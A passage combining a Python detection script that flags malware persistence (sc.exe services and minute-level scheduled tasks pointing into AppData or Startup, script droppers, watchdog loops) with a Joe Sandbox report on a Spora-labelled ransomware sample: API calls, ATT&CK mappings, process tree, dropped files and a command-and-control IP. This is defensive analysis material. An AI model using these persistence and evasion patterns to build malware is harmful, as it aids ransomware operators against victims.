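# A script sitting directly in C:\Users\<x>\AppData\ (no Roaming/Local subfolder).
APPDATA_ROOT_SCRIPT_RE = re.compile(r'[A-Z]:\\[^"]*?\\AppData\\[^\\"]+\.(?:vbs|js|wsf|bat|cmd)', re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:bat|cmd|vbs|js|wsf|ps1)$", re.I)


def image_name(ev):
    return ev["Image"].rsplit("\\", 1)[-1].lower()


def rule_sc_create(ev):
    """sc.exe create whose binPath= lands in a Startup folder or under AppData."""
    if image_name(ev) != "sc.exe":
        return None
    cl = ev["CommandLine"]
    m = re.search(r'binPath=\s*"([^"]+)"', cl, re.I)
    if not m or not re.search(r"\bcreate\b", cl, re.I):
        return None
    target = m.group(1)
    if STARTUP_DIR_RE.search(target) or APPDATA_RE.search(target):
        return ("sc_create_user_writable_binpath", target)
    return None


def rule_schtasks(ev):
    """schtasks /create with a minute-level trigger that runs a script or something under AppData."""
    if image_name(ev) != "schtasks.exe":
        return None
    cl = ev["CommandLine"]
    if not re.search(r"/create\b", cl, re.I):
        return None
    sc = re.search(r"/sc\s+(\w+)", cl, re.I)
    mo = re.search(r"/mo\s+(\d+)", cl, re.I)
    tr = re.search(r"""/tr\s+["']*([^"']+)""", cl, re.I)
    if not (sc and tr) or sc.group(1).lower() != "minute":
        return None
    interval = int(mo.group(1)) if mo else 1  # /sc minute without /mo means every minute
    target = tr.group(1).strip()
    if interval <= 15 and (APPDATA_RE.search(target) or SCRIPT_EXT_RE.search(target)):
        return ("schtasks_minute_script_appdata", f"every {interval} min -> {target}")
    return None


def rule_wsh_dropper(ev):
    """wscript/cscript executing a script dropped directly into the AppData root."""
    if image_name(ev) not in ("wscript.exe", "cscript.exe"):
        return None
    m = APPDATA_ROOT_SCRIPT_RE.search(ev["CommandLine"])
    return ("wsh_script_in_appdata_root", m.group(0)) if m else None


def rule_watchdog(events, min_cycles=3):
    """Repeated tasklist /fi "ImageName eq X" polls interleaved with timeout sleeps from one parent."""
    polls, sleeps = Counter(), Counter()
    for ev in events:
        parent, name = ev["ParentImage"].lower(), image_name(ev)
        if name == "tasklist.exe":
            m = re.search(r'ImageName\s+eq\s+([^"\s]+)', ev["CommandLine"], re.I)
            if m:
                polls[(parent, m.group(1).lower())] += 1
        elif name == "timeout.exe" and re.search(r"/t\s+\d+", ev["CommandLine"], re.I):
            sleeps[parent] += 1
    return [("process_watchdog_loop", f"{parent} polled for {target} {n}x with {sleeps[parent]} sleeps")
            for (parent, target), n in polls.items()
            if n >= min_cycles and sleeps[parent] >= min_cycles]


PER_EVENT_RULES = (rule_sc_create, rule_schtasks, rule_wsh_dropper)


def scan(events):
    """Return (rule_name, detail) tuples for every rule hit over the event list."""
    hits = [hit for ev in events for rule in PER_EVENT_RULES if (hit := rule(ev))]
    hits.extend(rule_watchdog(events))
    return hits


if __name__ == "__main__":
    for name, detail in scan(SAMPLE_EVENTS):
        print(f"{name}: {detail}")
```

A caveat the report itself illustrates: the first sc invocation passes start=auto without the space that sc.exe's option parser requires after the equals sign, so that call fails on syntax and only the start= auto retries can register SqlBakup. The rule therefore keys on the binPath target rather than on whether the command is well-formed, and flags both attempts; a defender wants the intent, not only the successful registration.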
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
Source: Xinfecter.exe, 00000030.00000002.1395053715.00000000008AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01105 cpuid 0_2_00B01105
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: ___crtGetLocaleInfoEx,0_2_00AFC03B
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00AFC347
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00B3E50A
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B3E782
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B3E7CD
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3E8F5
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B3E868
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00B3EB45
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: EnumSystemLocalesW,0_2_00B32C30
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B3EC6E
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00B3ED75
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3EE42
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: GetLocaleInfoW,0_2_00B3311A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: ___crtGetLocaleInfoEx,48_2_0009C03B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_0009C347
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,48_2_000DE50A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000DE782
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000DE7CD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000DE868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,48_2_000DE8F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_000DEB45
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,48_2_000D2C30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,48_2_000DEC6E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_000DED75
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,48_2_000DEE42
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,48_2_000D311A
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (6 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation (2 entries)
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01BDB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B01BDB
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A836F0 GetUserNameW,0_2_00A836F0
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B3B462 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00B3B462
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B06793 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_00B06793
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (2 entries)
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (2 entries)
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A71960 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71960
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A71020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71020
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A712E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A712E0
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B12073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00B12073
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B12D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00B12D69
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000B2073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,48_2_000B2073
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000B2D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,48_2_000B2D69
MITRE ATT&CK matrix. The number in parentheses after a technique is the count of matched signatures the report attributes to it; cells without a number are template entries with no hit.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (12) | Replication Through Removable Media (1) | Windows Management Instrumentation (241) | Scripting (12) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (1) | DLL Side-Loading (1) | Windows Service (11) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Peripheral Device Discovery (11) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Windows Service (11) | Process Injection (12) | Obfuscated Files or Information (2) | Security Account Manager | Account Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Standard Port (11) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Service Execution (1) | Scheduled Task/Job (1) | Scheduled Task/Job (1) | DLL Side-Loading (1) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (2) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Registry Run Keys / Startup Folder (12) | Registry Run Keys / Startup Folder (12) | File Deletion (1) | LSA Secrets | System Information Discovery (68) | SSH | Keylogging | Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (11) | Cached Domain Credentials | Network Share Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (15) | DCSync | Security Software Discovery (281) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (12) | Proc Filesystem | Virtualization/Sandbox Evasion (15) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Indicator Removal (1) | /etc/passwd and /etc/shadow | Process Discovery (3) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | System Network Configuration Discovery (1) | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1569984 | Sample: BiXS3FRoLe.exe | Start date: 06/12/2024 | Architecture: WINDOWS | Score: 100
(The rendered graph is not reproduced here; the information it carried is summarized below.)

Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 12 other signatures.

Network contacts from BiXS3FRoLe.exe:
• api.ipify.org (104.26.13.205, port 80, CLOUDFLARENET, United States)
• 185.147.34.53, port 3586 (HOSTSLIM-GLOBAL-NETWORK NL, Iceland)

Files dropped by BiXS3FRoLe.exe:
• C:\Users\user\AppData\...\Xinfecter.exe (PE32)
• C:\Windows\SysMain.sys (ASCII)
• C:\Users\user\AppData\S-8459.vbs (ASCII)
• 4 other malicious files

Process tree (signatures attached to a node in square brackets):
• BiXS3FRoLe.exe [Deletes shadow drive data (may be related to ransomware); Drops PE files to the startup folder; Sample is not signed and drops a device driver; Contains functionality to clear event logs]
  • cmd.exe -> systeminfo.exe [Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter); Writes or reads registry keys via WMI], find.exe
  • cmd.exe -> wscript.exe [Windows Scripting host queries suspicious COM object (likely to drop second stage)]
    • -> cmd.exe -> tasklist.exe, conhost.exe, find.exe, 12 other processes
    • -> cmd.exe -> conhost.exe
  • cmd.exe [Uses schtasks.exe or at.exe to add and modify task schedules] -> tasklist.exe, findstr.exe
  • 9 other processes -> 6 other processes
• cmd.exe -> wscript.exe [Windows Scripting host queries suspicious COM object (likely to drop second stage)], conhost.exe
  • wscript.exe -> cmd.exe -> conhost.exe, tasklist.exe, find.exe
  • wscript.exe -> cmd.exe -> conhost.exe
• svchost.exe [Changes security center settings (notifications, updates, antivirus, firewall)] -> MpCmdRun.exe -> conhost.exe
• 5 other processes -> conhost.exe

Antivirus results for the submitted sample:

Source | Detection | Scanner | Label | Link
BiXS3FRoLe.exe | 84% | ReversingLabs | Win32.Ransomware.Spora |
BiXS3FRoLe.exe | 100% | Avira | HEUR/AGEN.1353205 |
BiXS3FRoLe.exe | 100% | Joe Sandbox ML | |

Antivirus results for dropped files:

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 100% | Avira | HEUR/AGEN.1353205 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 84% | ReversingLabs | Win32.Ransomware.Spora |

No Antivirus matches in the remaining categories.
Domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.13.205 | true | false | | high
URLs. Every entry below was rated Malicious: false, with no antivirus detection and Reputation: high; the Source column names the process and memory dump (or dropped file) the string was found in.

Name | Source
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000006.00000003.1364296546.000001F12F65E000.00000004.00000020.00020000.00000000.sdmp
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000006.00000002.1365100771.000001F12F678000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364027254.000001F12F676000.00000004.00000020.00020000.00000000.sdmp
http://api.ipify.org/E | BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp
https://www.coinbase.com/how-to-buy/bitcoin | BiXS3FRoLe.exe, Xinfecter.exe.0.dr
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmp
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
https://www.kraken.com/learn/buy-bitcoin-btc | BiXS3FRoLe.exe, Xinfecter.exe.0.dr
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
http://api.ipify.org | BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000006.00000002.1364951726.000001F12F646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364082851.000001F12F670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364394555.000001F12F645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364275582.000001F12F65F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1365083917.000001F12F672000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp
https://dynamic.t | svchost.exe, 00000006.00000002.1364826982.000001F12F627000.00000004.00000020.00020000.00000000.sdmp
http://api.ipify.org/) | BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmp
http://api.ipify.org/ | BiXS3FRoLe.exe, 00000000.00000002.2503580325.0000000000769000.00000004.00000010.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmp
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmp
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmp
http://www.bingmapsportal.com | svchost.exe, 00000006.00000002.1364826982.000001F12F613000.00000004.00000020.00020000.00000000.sdmp
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmp
                                                                                https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.1364011107.000001F12F655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
185.147.34.53 | unknown | Iceland | 207083 | HOSTSLIM-GLOBAL-NETWORKNL | true

Note: 185.147.34.53 is reached by raw IP with no domain and is the only address flagged malicious; the context tables below tie it to other TrojanRansom submissions.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569984
Start date and time: 2024-12-06 13:41:25 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 64
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BiXS3FRoLe.exe (renamed because the original name is a hash value)
Original Sample Name: 1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.evad.winEXE@118/19@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 54
• Number of non-executed functions: 182
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
